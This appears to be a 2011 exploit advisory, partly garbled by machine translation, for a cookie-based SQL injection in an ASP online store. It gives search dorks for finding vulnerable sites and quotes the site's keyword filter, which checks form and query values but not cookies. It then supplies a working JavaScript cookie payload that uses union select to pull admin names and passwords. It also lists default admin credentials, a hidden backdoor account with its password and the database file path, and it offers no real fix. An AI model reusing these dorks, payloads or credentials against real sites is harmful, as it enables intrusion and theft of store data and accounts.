Cookies injection vulnerability in asp online marketplace and Its Repair

######################################## ####################################
#
# Title: Cookie injection vulnerability in asp online store

# Time: 2011-09-25

# Team: makebugs

# Author: Qingtian Xiaozhu
######################################## ####################################

PS: help step on ~!

Keyword: inurl: sort. asp? Sort_id =
Or inurl: pinpai. asp? Pinrule _id =

'Form data preliminary judgment, test attack statements
Code:
Form_Badword = "% 20or % 20 | '|" "| % | update | select | delete | insert | java | script | exec | cmd | shell | count | mid | char | drop | master | from | net % 20user |/add | iframe"
If request. form <> "" and uBits = "" then
Chk_badword = split (Form_Badword, "| ")
For each name IN Request. Form
For I = 0 to ubound (Chk_badword)
If Instr (LCase (request. form (name), Chk_badword (I) <> 0 Then
Showerr "e"
End If
NEXT
NEXT
End if

'Parameter preliminary judgment, test the attack statement
Query_Badword = "% 20or % 20 | '|" "| % | update | = | select | delete | insert | java | script | exec | cmd | shell | count | mid | char | drop | master | from | net % 20user |/add | iframe"
If request. QueryString <> "then
Chk_badword = split (Query_Badword, "| ")
For each Query_Name IN Request. QueryString
For I = 0 to ubound (Chk_badword)
If Instr (LCase (request. QueryString (Query_Name), Chk_badword (I) <> 0 Then
Showerr "e"
End If
NEXT
NEXT
End if

Http://www.bkjia.com/sort. asp? Sort_id = 1

// No cookies detected, you know.

Exp:
Javascript: alert (document. cookie = "sort_id =" + escape ("1 and 1 = 2 union select 1, admin_name, admin_pass, 6, 7 from ad_admin "))

Back-end databases can be backed up, you know ~!!!!!
Need NC call do not understand reference http://www.bkjia.com/Article/201106/92845.html

The default admin account password is admin admin888.

There is also a hidden account swit xuxinyao999
Backdoor?

Default Database address: Database/shopdata. mdb

Fixed: Old Problem